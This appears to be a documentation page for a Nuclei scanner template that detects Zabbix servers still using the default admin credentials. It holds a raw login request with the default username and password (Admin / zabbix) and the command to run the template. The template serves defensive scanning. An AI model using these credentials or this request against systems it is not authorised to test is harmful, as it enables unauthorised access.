Skip to content

Zabbix Default Login

ID: zabbix-default-login

Severity: high

Author: pdteam

Tags: zabbix,default-login

Zabbix default admin credentials were discovered.

id: zabbix-default-login
info:
name: Zabbix Default Login
author: pdteam
severity: high
description: Zabbix default admin credentials were discovered.
reference:
- https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 2
tags: zabbix,default-login
http:
- raw:
- |
POST {{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
name={{username}}&password={{password}}&autologin=1&enter=Sign+in
payloads:
path:
- /index.php
- /zabbix/index.php
username:
- Admin
password:
- zabbix
attack: clusterbomb
matchers-condition: and
matchers:
- type: word
part: header
words:
- "zabbix.php?action=dashboard.view"
- type: status
status:
- 302
# digest: 4b0a00483046022100ae60499b0d805e1ed841a2a2f86227c8c84088188aa26623b2d7724cc4c36119022100ac283aa888763a5e3981df66823d9f146bf960d99e22762678baa862229dd896:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/zabbix/zabbix-default-login.yaml"

View on Github